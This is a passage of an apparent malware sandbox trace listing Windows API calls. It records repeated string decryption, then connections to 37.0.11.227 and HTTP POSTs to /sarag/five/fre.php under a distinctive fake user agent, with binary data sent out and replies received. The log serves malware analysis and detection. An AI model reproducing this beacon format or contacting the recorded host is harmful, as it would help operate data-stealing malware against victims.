CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0223.360] GetProcessHeap () returned 0x690000 [0223.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0223.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.364] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.365] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.365] GetProcessHeap () returned 0x690000 [0223.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0223.365] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.365] GetProcessHeap () returned 0x690000 [0223.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0223.366] GetProcessHeap () returned 0x690000 [0223.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0223.366] GetProcessHeap () returned 0x690000 [0223.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0223.366] GetProcessHeap () returned 0x690000 [0223.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0223.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.372] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0223.381] GetProcessHeap () returned 0x690000 [0223.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0223.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.382] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0223.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.383] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.386] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.386] GetProcessHeap () returned 0x690000 [0223.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0223.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.387] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0223.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.389] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0223.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.390] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0223.390] GetProcessHeap () returned 0x690000 [0223.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0223.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.391] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0223.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.392] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0223.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.393] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0223.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0223.394] GetProcessHeap () returned 0x690000 [0223.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0223.394] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0223.394] GetProcessHeap () returned 0x690000 [0223.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0223.394] socket (af=2, type=1, protocol=6) returned 0x58c [0223.395] connect (s=0x58c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0223.421] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0223.421] GetProcessHeap () returned 0x690000 [0223.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0223.421] GetProcessHeap () returned 0x690000 [0223.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0223.422] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.423] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.423] GetProcessHeap () returned 0x690000 [0223.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0223.423] GetProcessHeap () returned 0x690000 [0223.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.423] GetProcessHeap () returned 0x690000 [0223.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0223.423] GetProcessHeap () returned 0x690000 [0223.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0223.424] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.425] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.425] GetProcessHeap () returned 0x690000 [0223.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0223.425] GetProcessHeap () returned 0x690000 [0223.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.425] send (s=0x58c, buf=0x6ab500*, len=242, flags=0) returned 242 [0223.426] send (s=0x58c, buf=0x6aba40*, len=159, flags=0) returned 159 [0223.426] GetProcessHeap () returned 0x690000 [0223.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0223.426] recv (in: s=0x58c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0223.511] GetProcessHeap () returned 0x690000 [0223.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0223.512] GetProcessHeap () returned 0x690000 [0223.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0223.513] GetProcessHeap () returned 0x690000 [0223.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0223.514] GetProcessHeap () returned 0x690000 [0223.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0223.514] closesocket (s=0x58c) returned 0 [0223.515] GetProcessHeap () returned 0x690000 [0223.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0223.515] GetProcessHeap () returned 0x690000 [0223.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0223.515] GetProcessHeap () returned 0x690000 [0223.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.516] GetProcessHeap () returned 0x690000 [0223.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0223.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x918) returned 0x58c [0223.521] Sleep (dwMilliseconds=0xea60) [0223.522] GetProcessHeap () returned 0x690000 [0223.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0223.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.524] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0223.542] GetProcessHeap () returned 0x690000 [0223.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0223.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.543] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.544] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.545] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.545] GetProcessHeap () returned 0x690000 [0223.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0223.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.547] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0223.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.548] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.548] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0223.548] GetProcessHeap () returned 0x690000 [0223.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0223.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.554] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.557] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.558] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.558] GetProcessHeap () returned 0x690000 [0223.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0223.558] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.559] GetProcessHeap () returned 0x690000 [0223.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0223.559] GetProcessHeap () returned 0x690000 [0223.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0223.560] GetProcessHeap () returned 0x690000 [0223.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0223.560] GetProcessHeap () returned 0x690000 [0223.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0223.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.561] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0223.573] GetProcessHeap () returned 0x690000 [0223.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0223.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.574] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.576] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.577] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.577] GetProcessHeap () returned 0x690000 [0223.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0223.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.578] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0223.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.579] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.580] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0223.580] GetProcessHeap () returned 0x690000 [0223.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0223.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.581] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0223.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.584] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0223.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.586] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0223.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.587] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0223.587] GetProcessHeap () returned 0x690000 [0223.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0223.587] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0223.588] GetProcessHeap () returned 0x690000 [0223.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0223.588] socket (af=2, type=1, protocol=6) returned 0x590 [0223.588] connect (s=0x590, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0223.615] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0223.615] GetProcessHeap () returned 0x690000 [0223.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0223.615] GetProcessHeap () returned 0x690000 [0223.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0223.618] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.619] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.619] GetProcessHeap () returned 0x690000 [0223.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0223.619] GetProcessHeap () returned 0x690000 [0223.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.620] GetProcessHeap () returned 0x690000 [0223.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0223.620] GetProcessHeap () returned 0x690000 [0223.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0223.621] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.622] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.622] GetProcessHeap () returned 0x690000 [0223.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0223.622] GetProcessHeap () returned 0x690000 [0223.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.623] send (s=0x590, buf=0x6ad508*, len=242, flags=0) returned 242 [0223.623] send (s=0x590, buf=0x6aba40*, len=159, flags=0) returned 159 [0223.623] GetProcessHeap () returned 0x690000 [0223.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0223.623] recv (in: s=0x590, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0223.699] GetProcessHeap () returned 0x690000 [0223.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0223.700] GetProcessHeap () returned 0x690000 [0223.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0223.700] GetProcessHeap () returned 0x690000 [0223.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0223.700] GetProcessHeap () returned 0x690000 [0223.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0223.701] closesocket (s=0x590) returned 0 [0223.701] GetProcessHeap () returned 0x690000 [0223.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0223.701] GetProcessHeap () returned 0x690000 [0223.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.702] GetProcessHeap () returned 0x690000 [0223.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.702] GetProcessHeap () returned 0x690000 [0223.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0223.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x948) returned 0x590 [0223.705] Sleep (dwMilliseconds=0xea60) [0223.707] GetProcessHeap () returned 0x690000 [0223.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0223.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0223.722] GetProcessHeap () returned 0x690000 [0223.722] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0223.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.723] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.735] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.736] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.736] GetProcessHeap () returned 0x690000 [0223.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0223.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.737] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0223.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.738] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.739] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0223.739] GetProcessHeap () returned 0x690000 [0223.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0223.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.741] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.742] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.744] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.745] StrStrA 